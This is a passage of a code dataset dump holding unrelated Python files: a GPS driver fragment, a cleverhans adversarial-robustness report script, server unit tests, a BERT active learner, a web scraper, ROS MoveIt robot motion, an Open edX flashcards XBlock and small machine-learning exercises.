{alt}\")\n\t\t\t\tprint(f\"easting, northing: {easting}, {northing}\")\n\t\t\t\tprint(f\"zone and letter: {zone}{letter}\")\n\t\t\t\t\n\texcept rospy.ROSInterruptException:\n\t\tport.close()\n\t\t\n\t\t\n\t\t\n\t\t\n","repo_name":"SumeghaS/Robot-Sensing-and-Navigation","sub_path":"Navigation_Stack/src/driver/scripts/gps_driver.py","file_name":"gps_driver.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72232653664","text":"#!/usr/bin/env python3\n\"\"\"\nmake_confidence_report_bundle_examples.py\nUsage:\n make_confidence_report_bundle_examples.py model.joblib a.npy\n make_confidence_report_bundle_examples.py model.joblib a.npy b.npy c.npy\n\n where model.joblib is a file created by cleverhans.serial.save containing\n a picklable cleverhans.model.Model instance and each examples_i.npy is\n a saved numpy array containing adversarial examples for a whole dataset.\n Usually example_i.npy is the output of make_confidence_report.py or\n make_confidence_report_bundled.py.\n\nThis script uses max-confidence attack bundling\n( https://openreview.net/forum?id=H1g0piA9tQ )\nto combine adversarial example datasets that were created earlier.\nIt will save a ConfidenceReport to to model_bundled_examples_report.joblib.\nThe report can be later loaded by another\nscript using cleverhans.serial.load.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport warnings\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom cleverhans.utils_tf import silence\n\n# We need to disable pylint's complaints about import order because `silence`\n# works only if it is called before the other imports.\n# pylint: disable=C0413\nsilence()\nfrom cleverhans.attack_bundling import bundle_examples_with_goal, MaxConfidence\nfrom cleverhans import serial\nfrom cleverhans.compat import flags\nfrom cleverhans.confidence_report import BATCH_SIZE\nfrom cleverhans.confidence_report import TRAIN_START, TRAIN_END\nfrom cleverhans.confidence_report import TEST_START, TEST_END\nfrom cleverhans.confidence_report import WHICH_SET\n\n\nFLAGS = flags.FLAGS\n\n\ndef main(argv=None):\n \"\"\"\n Make a confidence report and save it to disk.\n \"\"\"\n assert len(argv) >= 3\n _name_of_script = argv[0]\n model_filepath = argv[1]\n adv_x_filepaths = argv[2:]\n\n sess = tf.Session()\n with sess.as_default():\n model = serial.load(model_filepath)\n\n factory = model.dataset_factory\n factory.kwargs[\"train_start\"] = FLAGS.train_start\n factory.kwargs[\"train_end\"] = FLAGS.train_end\n factory.kwargs[\"test_start\"] = FLAGS.test_start\n factory.kwargs[\"test_end\"] = FLAGS.test_end\n dataset = factory()\n\n adv_x_list = [np.load(filepath) for filepath in adv_x_filepaths]\n x, y = dataset.get_set(FLAGS.which_set)\n for adv_x in adv_x_list:\n assert adv_x.shape == x.shape, (adv_x.shape, x.shape)\n # Make sure these were made for the right dataset with right scaling\n # arguments, etc.\n assert adv_x.min() >= 0.0 - dataset.kwargs[\"center\"] * dataset.max_val\n assert adv_x.max() <= dataset.max_val\n data_range = dataset.max_val * (1.0 + dataset.kwargs[\"center\"])\n\n if adv_x.max() - adv_x.min() <= 0.8 * data_range:\n warnings.warn(\n \"Something is weird. Your adversarial examples use \"\n \"less than 80% of the data range.\"\n \"This might mean you generated them for a model with \"\n \"inputs in [0, 1] and are now using them for a model \"\n \"with inputs in [0, 255] or something like that. \"\n \"Or it could be OK if you're evaluating on a very small \"\n \"batch.\"\n )\n\n report_path = FLAGS.report_path\n if report_path is None:\n suffix = \"_bundled_examples_report.joblib\"\n assert model_filepath.endswith(\".joblib\")\n report_path = model_filepath[: -len(\".joblib\")] + suffix\n\n goal = MaxConfidence()\n bundle_examples_with_goal(\n sess, model, adv_x_list, y, goal, report_path, batch_size=FLAGS.batch_size\n )\n\n\nif __name__ == \"__main__\":\n flags.DEFINE_string(\"report_path\", None, \"Report path\")\n flags.DEFINE_integer(\n \"train_start\",\n TRAIN_START,\n \"Starting point (inclusive)\" \"of range of train examples to use\",\n )\n flags.DEFINE_integer(\n \"train_end\",\n TRAIN_END,\n \"Ending point (non-inclusive) \" \"of range of train examples to use\",\n )\n flags.DEFINE_integer(\n \"test_start\",\n TEST_START,\n \"Starting point \" \"(inclusive) of range of test examples to use\",\n )\n flags.DEFINE_integer(\n \"test_end\",\n TEST_END,\n \"End point (non-inclusive) of \" \"range of test examples to use\",\n )\n flags.DEFINE_string(\"which_set\", WHICH_SET, '\"train\" or \"test\"')\n flags.DEFINE_integer(\"batch_size\", BATCH_SIZE, \"batch size\")\n tf.app.run()\n","repo_name":"cleverhans-lab/cleverhans","sub_path":"cleverhans_v3.1.0/scripts/make_confidence_report_bundle_examples.py","file_name":"make_confidence_report_bundle_examples.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":5963,"dataset":"github-code","pt":"7"} +{"seq_id":"74900854304","text":"import unittest\nfrom server import *\n\n\nclass TestServer(unittest.TestCase):\n def test_check_ip_localhost(self):\n self.assertEqual(check_ip('localhost'), 'localhost')\n\n def test_check_ip_incorrect(self):\n with self.assertRaises(ValueError) as e:\n check_ip('127.1000.0.1')\n the_exception = str(e.exception)\n self.assertEqual(the_exception, 'некорректный IP-адрес сервера')\n\n def test_check_port_correct(self):\n self.assertEqual(check_port(12000), 12000)\n\n def test_check_port_big(self):\n with self.assertRaises(ValueError) as e:\n check_port(65999)\n the_exception = str(e.exception)\n self.assertEqual(the_exception, 'некорректный tcp-порт')\n\n def test_msg_processing_correct(self):\n msg = {\n 'action': 'presence',\n 'time': '06-12-2022 12:00',\n 'user': {\n 'account_name': 'alla',\n 'status': 'online'\n }\n }\n self.assertEqual(msg_processing(msg), {'response': 200})\n\n def test_msg_processing_missing_field(self):\n msg = {\n 'action': 'presence',\n 'user': {\n 'account_name': 'alla',\n 'status': 'online'\n }\n }\n self.assertEqual(msg_processing(msg), {'response': 400, 'error': 'bad request'})\n\n def test_msg_conversion_dict(self):\n self.assertEqual(msg_conversion({'user': {'account_name': 'alla', 'status': 'online'}}),\n b'{\"user\": {\"account_name\": \"alla\", \"status\": \"online\"}}')\n\n def test_msg_conversion_bytes(self):\n self.assertEqual(msg_conversion(b'{\"user\": {\"account_name\": \"alla\", \"status\": \"online\"}}'),\n {'user': {'account_name': 'alla', 'status': 'online'}})\n\n def test_set_addr_port_all(self):\n test_argv = ['server.py', '-a', 'localhost', '-p', '8888']\n test_argv_change = ['server.py', '-p', '8888', '-a', 'localhost']\n self.assertEqual(set_addr_port(test_argv), ('localhost', 8888))\n self.assertEqual(set_addr_port(test_argv_change), ('localhost', 8888))\n\n def test_set_addr_port_incorrect_param(self):\n with self.assertRaises(SystemExit):\n test_argv = ['server.py', '-a', 'localhost', '-p']\n set_addr_port(test_argv)\n with self.assertRaises(SystemExit):\n test_argv = ['server.py', '-p', 'test', '-a', 'localhost']\n set_addr_port(test_argv)\n with self.assertRaises(SystemExit):\n test_argv = ['server.py', '-p', '333333', '-a', 'localhost']\n set_addr_port(test_argv)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"AllaSamoylik/Geek-University-Python2","sub_path":"Homework_4/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6741628719","text":"from celery.utils.log import get_task_logger\nfrom celery import shared_task\nfrom core.utils import fetch_quotes, parse_key\nfrom quotes.serializers import QuoteSerializer\n\n\nlogger = get_task_logger(__name__)\n\n\n@shared_task\ndef save_currency_quotes():\n logger.info('Running Currency Quotes Saving Task')\n\n # Fetch result from alphavantage\n response = fetch_quotes()\n\n # Clean up data\n currency_quote = response['Realtime Currency Exchange Rate']\n for key in list(currency_quote):\n new_key_name = parse_key(key)\n currency_quote[new_key_name] = currency_quote.pop(key)\n\n # Update our datastore\n quotes_serializer = QuoteSerializer(\n data=currency_quote)\n if quotes_serializer.is_valid():\n quotes_serializer.save()\n\n return 'Ok'\n","repo_name":"joshuachinemezu/coin-quotes","sub_path":"quotes/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"35363422393","text":"import os\nimport sys\nimport json\nimport torch\nimport logging\nimport numpy as np\nfrom torch import nn\nfrom transformers import AutoModelForSequenceClassification\nfrom sklearn.pipeline import Pipeline\nfrom skorch import NeuralNetClassifier\nfrom skorch.callbacks import LRScheduler, ProgressBar\nfrom skorch.hf import HuggingfacePretrainedTokenizer\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom skorch.callbacks import EarlyStopping\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.metrics import balanced_accuracy_score\nfrom modAL.models import ActiveLearner\nfrom modAL.uncertainty import uncertainty_sampling\n\n\n# Basic logging configuration\nlogging.basicConfig(format=\"%(asctime)s %(message)s\")\n\n\nclass BertModule(nn.Module):\n \"\"\"BERT model according to Skorch convention\"\"\"\n\n def __init__(self, name, num_labels):\n super().__init__()\n self.name = name\n self.num_labels = num_labels\n self.reset_weights()\n\n def reset_weights(self):\n self.bert = AutoModelForSequenceClassification.from_pretrained(\n self.name, num_labels=self.num_labels\n )\n\n def forward(self, **kwargs):\n pred = self.bert(**kwargs)\n return pred.logits\n\n\nclass ActiveBert:\n \"\"\"BERT active learner\n METHODS:\n query_loop: a continous loop for performing active learning.\n Continues until the pool is empty, or until user\n interrupt.\n lr_schedule: returns the learning rate based on current step\n calc_score: calculates f_1, precision, recall, accuracy and\n balanced accuracy\n predict: predicts input using model\n VARIABLES:\n dl: dataloader containing all datasets\n BATCH_SIZE: model batch size according to hyper parameters\n POOL_SAMPLE_SIZE: sample extracted from X_pool during each\n iteration of active learning\n \"\"\"\n\n def __init__(self, dl):\n \"\"\"initializes active learner, fitting data using parameters file\"\"\"\n self.dl = dl\n logging.warning(\"Importing hyper parameters from file\")\n assert os.path.exists(\"hyper_parameters.json\")\n with open(\"hyper_parameters.json\", \"r\") as f:\n HYPER = json.load(f)\n DEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n if DEVICE != \"cuda\":\n while True:\n ans = input(\"GPU not detected. Continue using CPU? [y/n] \")\n if ans == \"n\":\n sys.exit(1)\n elif ans == \"y\":\n break\n logging.warning(\"Initializing %s\" % HYPER[\"MODEL\"])\n pipeline = Pipeline(\n [\n (\n \"tokenizer\",\n HuggingfacePretrainedTokenizer(HYPER[\"PRETRAINED_TOKENIZER\"]),\n ),\n (\n \"net\",\n NeuralNetClassifier(\n BertModule,\n module__name=HYPER[\"MODEL\"],\n module__num_labels=len(set(self.dl.y_train)),\n optimizer=eval(HYPER[\"OPTIMIZER\"]),\n lr=HYPER[\"LR\"],\n max_epochs=HYPER[\"MAX_EPOCHS\"],\n criterion=eval(HYPER[\"CRITERION\"]),\n batch_size=HYPER[\"BATCH_SIZE\"],\n iterator_train__shuffle=True,\n device=DEVICE,\n callbacks=[\n EarlyStopping(patience=HYPER[\"PATIENCE\"]),\n LRScheduler(\n LambdaLR, lr_lambda=self.lr_schedule, step_every=\"batch\"\n ),\n ProgressBar(),\n ],\n ),\n ),\n ]\n )\n self.num_training_steps = HYPER[\"MAX_EPOCHS\"] * (\n len(dl.X_train) // HYPER[\"BATCH_SIZE\"] + 1\n )\n logging.warning(\"Fitting %s\" % HYPER[\"MODEL\"])\n self.model = ActiveLearner(\n estimator=pipeline,\n query_strategy=uncertainty_sampling,\n X_training=dl.X_train,\n y_training=dl.y_train,\n )\n # hyper parameters that will be used elsewhere\n self.BATCH_SIZE = HYPER[\"BATCH_SIZE\"]\n self.POOL_SAMPLE_SIZE = HYPER[\"POOL_SAMPLE_SIZE\"]\n logging.warning(\"Model initialized\")\n\n def lr_schedule(self, current_step):\n \"\"\"Returns the learning schedule based on training steps\"\"\"\n factor = float(self.num_training_steps - current_step) / float(\n max(1, self.num_training_steps)\n )\n assert factor > 0\n return factor\n\n def calc_score(self, X, y):\n \"\"\"Calculates the performance of the model\"\"\"\n y_pred = self.model.predict(X)\n metrics = precision_recall_fscore_support(y, y_pred, average=\"weighted\")\n performance = {\n \"precision\": \"{:0.2f}\".format(metrics[0]),\n \"recall\": \"{:0.2f}\".format(metrics[1]),\n \"f1\": \"{:0.2f}\".format(metrics[2]),\n \"balanced accuracy\": \"%0.2f\" % balanced_accuracy_score(y, y_pred),\n }\n return performance\n\n def query_loop(self):\n \"\"\"Active learning loop\"\"\"\n accuracy_scores = [float(self.calc_score(self.dl.X_dev, self.dl.y_dev)[\"f1\"])]\n while len(self.dl.X_pool) >= self.BATCH_SIZE:\n print(f\"ACCURACY\\n{list(enumerate(accuracy_scores))}\")\n # keeps track of annotations for current iteration in loop\n X = np.empty(self.BATCH_SIZE, dtype=object)\n Y = np.zeros(self.BATCH_SIZE, dtype=int)\n\n # shuffle pools of unannotated tweets\n np.random.shuffle(self.dl.X_pool)\n np.random.shuffle(self.dl.y_pool)\n\n # extract samples of POOL_SAMPLE_SIZE from pool\n X_pool_sample = self.dl.X_pool[: self.POOL_SAMPLE_SIZE]\n y_pool_sample = self.dl.y_pool[: self.POOL_SAMPLE_SIZE]\n\n # remove those samples from the pool\n self.dl.X_pool = np.delete(\n self.dl.X_pool, np.arange(self.POOL_SAMPLE_SIZE), axis=0\n )\n self.dl.y_pool = np.delete(\n self.dl.y_pool, np.arange(self.POOL_SAMPLE_SIZE), axis=0\n )\n\n for i in range(self.BATCH_SIZE):\n # query active learner\n query_idx, query_inst = self.model.query(X_pool_sample)\n\n # print query and get input from user regarding annotation\n print(\"\\nANNOTATION %d/%d\" % (i + 1, self.BATCH_SIZE))\n print(query_inst[0])\n X[i] = query_inst[0]\n Y[i] = int(input(\"> \"))\n\n # remove tweet from sample so that it won't show up again\n X_pool_sample = np.delete(X_pool_sample, query_idx, axis=0)\n y_pool_sample = np.delete(y_pool_sample, query_idx, axis=0)\n\n # refit model using newly annotated data\n self.model.teach(X, Y)\n\n # calculate new accuracy score and add to history stack\n accuracy_scores.append(\n float(self.calc_score(self.dl.X_dev, self.dl.y_dev)[\"f1\"])\n )\n\n # add unused data back to pool\n self.dl.X_pool = np.concatenate((self.dl.X_pool, X_pool_sample))\n self.dl.y_pool = np.concatenate((self.dl.y_pool, y_pool_sample))\n\n def predict(self, X):\n return self.model.predict(X)\n","repo_name":"skogsgren/bert-eat-dog-world","sub_path":"activebert.py","file_name":"activebert.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15017123143","text":"import sys\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nfile = open('context1.log', 'ab')\ntry:\n for x in range(1, 401):\n if x < 10:\n xx = '00%d' % x\n elif 10 <= x < 100:\n xx = '0%d' % x\n else:\n xx = x\n url = 'http://www.jonahome.net/files/zmsg/zmsgc/zhanmeishi/Hymn%s.htm' % xx\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"accept-encoding\": \"gzip, deflate, sdch\",\n \"accept-language\": \"zh-CN,zh;q=0.8\",\n \"Referer\": \"https://www.exploit-db.com/\"\n }\n r = requests.get(url)\n r.encoding = 'gb2312'\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n txt = soup.find('div', class_='TitleLinks').text\n title = txt[txt.find(\"《\"): txt.find(\"》\")+1]\n content = txt[txt.find(\"》\")+1:].replace('\\r\\n', '
')\n sql = \"insert into hymn(hid, title,content) values('%s', %s','%s');\\r\\n\" % (xx, title, content)\n file.write(sql.encode('utf-8'))\n print(x)\n print(url)\nfinally:\n file.close()\n\n\n","repo_name":"aa2288207/PythonScript","sub_path":"Python3/zanmei.py","file_name":"zanmei.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31448009123","text":"import sys\nimport os\nimport tensorflow as tf\nimport tempfile\nimport moviepy.editor as mpy\nimport numpy as np\nimport uuid\nfrom PIL import Image\nimport os.path as path\n\n\ndef get_experiment_id():\n\n if len(sys.argv) != 2:\n raise Exception('Must provide experiment id or \"new\" keyword')\n\n if sys.argv[1] == 'new':\n return str(uuid.uuid4())\n\n if os.path.exists(os.path.join('output', sys.argv[1])):\n return sys.argv[1]\n\n raise Exception('Can not find experiment {0}'.format(sys.argv[1]))\n\n\ndef get_session(experiment_id):\n session = tf.Session()\n if os.path.exists(os.path.join('output', experiment_id)):\n saver = tf.train.Saver()\n path = os.path.join('output', experiment_id, 'checkpoints')\n latest_checkpoint = tf.train.latest_checkpoint(path)\n saver.restore(session, latest_checkpoint)\n else:\n session.run(tf.global_variables_initializer())\n return session\n\n\ndef create_folders(experiment_id):\n if not os.path.exists('output'):\n os.mkdir(os.path.join('output'))\n\n if not os.path.exists(os.path.join('output', experiment_id)):\n os.mkdir(os.path.join('output', experiment_id))\n os.mkdir(os.path.join('output', experiment_id, 'checkpoints'))\n os.mkdir(os.path.join('output', experiment_id, 'summaries'))\n\n\ndef tensor_to_gif_summ(summ):\n if isinstance(summ, bytes):\n summary_proto = tf.Summary()\n summary_proto.ParseFromString(summ)\n summ = summary_proto\n\n summary = tf.Summary()\n for value in summ.value:\n tag = value.tag\n images_arr = tf.make_ndarray(value.tensor)\n\n if len(images_arr.shape) != 4:\n raise ValueError('Tensors must be 4-D')\n if images_arr.shape[-1] != 1:\n raise ValueError('Tensors must have 1 channel')\n\n # encode sequence of images into gif string\n clip = mpy.ImageSequenceClip(list(images_arr), fps=30)\n with tempfile.NamedTemporaryFile() as f:\n filename = f.name + '.gif'\n clip.write_gif(filename, verbose=False)\n with open(filename, 'rb') as f:\n encoded_image_string = f.read()\n\n image = tf.Summary.Image()\n image.height = images_arr.shape[-3]\n image.width = images_arr.shape[-2]\n image.colorspace = 1 # code for 'RGB'\n image.encoded_image_string = encoded_image_string\n summary.value.add(tag=tag, image=image)\n return summary\n","repo_name":"koryakinp/mldriver-discrete-steering","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24335145948","text":"#!/usr/bin/env python3\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nfrom math import pi\nfrom std_msgs.msg import String\nfrom moveit_commander.conversions import pose_to_list\n\n#initialise moveit_commander and a rospy node\nmoveit_commander.roscpp_initialize(sys.argv)\nrospy.init_node('move_group_python_inferace', anonymous=True)\n\n#instantiate a RobotCommander object\nrobot = moveit_commander.RobotCommander()\n\n#instantitate a PlanningSceneInterface object\nscene = moveit_commander.PlanningSceneInterface()\n\n#instantitate a MoveGroupCommander object\ngroup_name=\"manipulator\"\nmove_group=moveit_commander.MoveGroupCommander(group_name)\n\n#Create DisplayTrajectory ROS publisher which is used to display trajectories in Rviz\ndisplay_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=20)\n\n#Go to Home Position\nhome = [2.15339e-05, -2.26790, 2.24914, -1.62, -1.6, -0.33310]\nmove_group.set_joint_value_target(home)\nmove_group.go(wait=True)\n\nrospy.sleep(1)\n\n#Go to above source table\nsource = [-3.34562,-1.43934,1.50303,-1.62,-1.6,-0.33310]\nmove_group.set_joint_value_target(source)\nmove_group.go(source, wait=True)\n\nrospy.sleep(1)\n\n#Go to above object on source table\nsource_object = [-0.8616, 0.17825, 1.3065, -0.72637, -0.68707, -0.00936, 0.014766]\nmove_group.set_pose_target(source_object)\nmove_group.go(source_object, wait=True)\n\nrospy.sleep(1)\n\n#Move towards object in z-direction\npickpose = move_group.get_current_pose().pose\npickpose.position.z -= 0.5\nmove_group.set_pose_target(pickpose)\nmove_group.go(pickpose, wait=True)\n\nrospy.sleep(1)\n\n#Move upwards in z-direction\npickpose = move_group.get_current_pose().pose\npickpose.position.z += 0.5\nmove_group.set_pose_target(pickpose)\nmove_group.go(pickpose, wait=True)\n\nrospy.sleep(1)\n\n#Move above assembly table\nassembly = [-1.53122, -1.22303, 1.22964, -1.62, -1.6, -0.33310]\nmove_group.set_joint_value_target(assembly)\nmove_group.go(assembly, wait=True)\n\nrospy.sleep(1)\n\n#Move above plate on assembly table\nassembly_plate = [-1.78539, -1.29920, 1.31691, -1.62, -1.6, -0.33310]\nmove_group.set_pose_target(assembly_plate)\nmove_group.go(assembly_plate)\n\n#Move towards object in z-direction\nplacepose = move_group.get_current_pose().pose\nplacepose.position.z -= 0.5\nmove_group.set_pose_target(placepose)\nmove_group.go(placepose, wait=True)\n\nrospy.sleep(1)\n\n#Move upwards in z-direction\nplacepose = move_group.get_current_pose().pose\nplacepose.position.z += 0.5\nmove_group.set_pose_target(placepose)\nmove_group.go(placepose, wait=True)\n\nrospy.sleep(1)\n\n#Return to Home Position\nmove_group.set_joint_value_target(home)\nmove_group.go(wait=True)\n\nmove_group.stop()","repo_name":"MacaJJ/UR10_Robotiq_Workspace","sub_path":"src/myur10sim/myur10_moveit_config/scripts/pick_place_move_group.py","file_name":"pick_place_move_group.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21175950822","text":"\"\"\"\nDefines all losses related functions\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom rnnvis.rnn.varlen_support import last_relevant\n\n\ndef softmax(x, axis=None):\n if axis is None:\n x_max = np.max(x)\n e_x = np.exp(x - x_max)\n return e_x / np.sum(e_x)\n if axis == 1:\n x = x.T\n x_max = np.max(x, axis=0)\n e_x = np.exp(x - x_max)\n sm = e_x / np.sum(e_x, axis=0)\n return sm if axis == 0 else sm.T\n\n\ndef sequence_loss(outputs, targets):\n \"\"\"\n Weighted cross-entropy loss for a sequence of logits (per example).\n :param outputs: a 2D Tensor of shape [batch_size, output_size]\n :param targets: a 1D int32 Tensors of shape [batch_size]\n :return: a scalar tensor denoting the average loss of each example\n \"\"\"\n if len(outputs.get_shape()) == 2:\n flatten_shape = tf.shape(targets)\n elif len(outputs.get_shape()) == 3:\n shape = outputs.get_shape().as_list()\n outputs = tf.reshape(outputs, [-1, shape[2]])\n targets = tf.reshape(targets, [-1])\n flatten_shape = tf.shape(targets)\n else:\n raise ValueError(\"outputs must be 2D or 3D tensor!\")\n _loss = tf.nn.seq2seq.sequence_loss([outputs], [targets], [tf.ones(flatten_shape, dtype=outputs.dtype)])\n return _loss\n\n\ndef sentence_loss(last_outputs, targets):\n return sequence_loss(last_outputs, targets)\n","repo_name":"myaooo/RNNVis","sub_path":"rnnvis/rnn/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"7"} +{"seq_id":"16062360450","text":"\"\"\"\n Flashcards XBlock allowes the editor to add a list of quesitions and\n answers (separated by a semicolon) which are then displayed as flashcards.\n\"\"\"\n\nimport pkg_resources\n\nfrom xblock.core import XBlock\nfrom xblock.fields import Scope, Dict, String\nfrom xblock.fragment import Fragment\n\nfrom lxml import etree\n\nfrom jinja2 import Environment, PackageLoader\n\nenv = Environment(loader=PackageLoader('flashcards', 'static/html'))\n\n\nclass FlashcardsXBlock(XBlock):\n \"\"\"\n The content (the values between the tags) is saved as a\n dictionary and passed as a dictionary to the HTML template\n \"\"\"\n title = String(\n default=u\"Flashcards title\",\n scope=Scope.settings,\n help=u\"Title of the flashcards block\"\n )\n\n content = Dict(\n default={},\n scope=Scope.settings,\n help=u\"List of items\"\n )\n\n\n def resource_string(self, path):\n \"\"\"Handy helper for getting resources from our kit.\"\"\"\n data = pkg_resources.resource_string(__name__, path)\n return data.decode(\"utf8\")\n\n\n def student_view(self, context=None):\n \"\"\"Create fragment and send the appropriate context.\"\"\"\n context = {\n 'flashcards': self.content,\n 'title': self.title,\n }\n\n frag = Fragment()\n template = env.get_template(\"flashcards.html\")\n frag.add_content(template.render(**context))\n frag.add_css(self.resource_string(\"static/css/flashcards.css\"))\n frag.add_javascript(self.resource_string(\"static/js/src/flashcards.js\"))\n frag.initialize_js('FlashcardsXBlock')\n return frag\n\n @classmethod\n def parse_xml(cls, node, runtime, keys, id_generator):\n \"\"\"\n Parse the XML for an HTML block.\n\n The entire subtree under `node` is re-serialized, and set as the\n content of the XBlock.\n\n The content between the blocks is being transformed\n into a dictionary, and as such saved into the content class variable\n (which is accessable with self.content)\n \"\"\"\n block = runtime.construct_xblock_from_class(cls, keys)\n flashcards = {}\n\n for element in node.iter(\"flashcard\"):\n flashcards[element.attrib[\"front\"]] = element.attrib[\"back\"]\n\n block.content = flashcards\n block.title = node.attrib['title']\n return block\n\n\n @staticmethod\n def workbench_scenarios():\n \"\"\"A canned scenario for display in the workbench.\"\"\"\n return [\n (\"FlashcardsXBlock\",\n \"\"\"\n \n\n\n \n \n \"\"\"),\n ]\n\n def studio_view(self, context):\n \"\"\"Create a fragment used to display the edit view in the Studio.\"\"\"\n\n context = {\n 'flashcards': self.content,\n 'title': self.title,\n }\n\n frag = Fragment()\n template = env.get_template('flashcards_edit.html')\n frag.add_content(template.render(**context))\n frag.add_css(self.resource_string(\"static/css/flashcards_edit.css\"))\n frag.add_javascript(self.resource_string(\"static/js/src/flashcards_edit.js\"))\n frag.initialize_js('FlashcardsEditXBlock')\n return frag\n\n @XBlock.json_handler\n def studio_submit(self, data, suffix=''):\n \"\"\"Called when submitting the form in Studio.\"\"\"\n self.title = data.get('title')\n \n flashcards = {}\n\n fclist = data.get('flashcards').items()\n fclist.reverse() # print out the list in the same order as entered\n for item in fclist:\n front, back = item\n flashcards[front] = back \n\n self.content = flashcards\n\n return {'result':'success'}","repo_name":"vkaracic/FlashcardsXBlock","sub_path":"flashcards/flashcards.py","file_name":"flashcards.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"7681665297","text":"\"\"\"Different types of inheritance based upon parent and child classes\"\"\"\n\n\n# Single Inheritance\nclass Vehicle:\n def set_top_speed(self, speed):\n self.top_speed = speed\n print(f\"Top speed is set to: {self.top_speed}\")\n\n\nclass Car(Vehicle):\n def open_trunk(self):\n print(\"Trunk is now open\")\n\n\ncorolla = Car()\ncorolla.set_top_speed(220)\ncorolla.open_trunk()\n\n\n# Multi-level Inheritance\nclass Hybrid(Car):\n def turn_on_hybrid(self):\n print(\"Hybrid mode is now switched on!\")\n\n\npriusPrime = Hybrid()\npriusPrime.set_top_speed(250)\npriusPrime.open_trunk()\npriusPrime.turn_on_hybrid()\n\n\n# Hierarchical Inheritance\nclass Truck(Vehicle):\n def identity(self):\n print(\"This is a Truck\")\n\n\neicher = Truck()\neicher.identity()\n\n\n# Hybrid Inheritance\nclass Engine:\n def set_power(self, power):\n self.power = power\n\n\n# Multiple Inheritance\nclass CombustionEngine(Engine):\n def set_tank_capacity(self, tank_capacity):\n self.tank_capacity = tank_capacity\n\n\nclass ElectricEngine(Engine):\n def set_charge_capacity(self, charge_capacity):\n self.charge_capacity = charge_capacity\n\n\nclass HybridEngine(CombustionEngine, ElectricEngine):\n def print_details(self):\n print(f\"Power: {self.power}\")\n print(f\"Tank Capacity: {self.tank_capacity}\")\n print(f\"Charge Capacity: {self.charge_capacity}\")\n\n\ncar = HybridEngine()\ncar.set_power(\"2000 cc\")\ncar.set_charge_capacity(\"250 W\")\ncar.set_tank_capacity(\"20 Litres\")\ncar.print_details()\n","repo_name":"Maulik5041/Python_practice","sub_path":"Object Oriented Programming/Inheritance/types_of_inheritance.py","file_name":"types_of_inheritance.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23119465013","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\n\nfilename = './iris_data.csv'\n\ndf = pd.read_csv(filename, decimal=',')\n\nlabels_unique = df['Species'].unique()\ncolours = ['red', 'orange', 'green']\n\n\ndef scatter_plot():\n\n for i in range(0, 3):\n value = labels_unique[i]\n species_df = df.loc[df['Species'] == value]\n plt.scatter(\n species_df['Petal length'],\n species_df['Petal width'],\n color=colours[i],\n alpha=0.5,\n label=labels_unique[i]\n )\n\n plt.xlabel('sepal length')\n plt.ylabel('petal length')\n plt.title('petal length vs sepal length')\n\n\n return plt\n\n# scatter_plot()\n\n\ndata = df.drop(['Species'], axis=1)\n\ndef mean_shift(data, n_samples=1000):\n bandwidth = estimate_bandwidth(data, quantile=0.2, n_samples=n_samples)\n\n ms = MeanShift(bandwidth=bandwidth, bin_seeding=True)\n ms.fit(data)\n labels = ms.labels_\n cluster_centers = ms.cluster_centers_\n\n labels_unique = np.unique(labels)\n n_clusters = len(labels_unique)\n\n print('labels: {}'.format(labels))\n print('Number of estimated clusters : {}'.format(n_clusters))\n print('Cluster centers: {}'.format(cluster_centers))\n return labels, cluster_centers, n_clusters\n\n\nms = mean_shift(data)\n\ndef ms_plot(data):\n labels = data[0]\n cluster_centers = data[1]\n\n scatter_plot()\n\n plt.scatter(\n cluster_centers[0],\n cluster_centers[1],\n color=\"black\",\n alpha=1,\n )\n\n plt.show()\n\n \nms_plot(ms)\n\n\n","repo_name":"JesperHA/sem4python","sub_path":"week 